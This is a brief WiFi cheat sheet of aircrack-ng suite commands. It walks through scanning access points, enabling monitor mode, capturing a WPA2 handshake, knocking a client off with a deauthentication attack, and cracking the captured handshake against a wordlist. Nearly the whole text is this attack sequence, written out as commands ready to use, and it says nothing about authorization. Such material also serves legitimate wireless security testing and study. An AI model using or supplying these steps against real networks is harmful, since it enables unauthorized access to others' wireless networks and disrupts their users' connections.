WiFi Cheat Sheet

WiFi Cheat Sheet

nmcli device status

Prints the connected wireless adapters

iwlist [adapter] scan

Scans local AP’s (access points)

iwlist [adapter] scan | egrep ‘Address|ESSID’

Narrows down output of previous scan

airmon-ng start [adapter]

Starts monitor mode on selected adapter

iwconfig | grep ‘Monitor’

Shows the monitor mode device

airodump-ng [adapter]

Shows the access points and devices you can capture

Capture WPA2

To capture packets from an access point use the following command:

airodump-ng -c [channel of access point] -bssid [access point] -w [filename] [adapter]

Leave this running in a sole terminal

To perform a deauthentication attack use the following command in a second terminal window:

aireplay-ng -0 1 -a [accesspoint] -c [client address] [adapter]

Check on the first terminal or tab, we should now have captured the handshake

To use a word list against the captured handshake use the following command:

aircrack-ng -0 -w [wordlist] [captured filename(.cap)]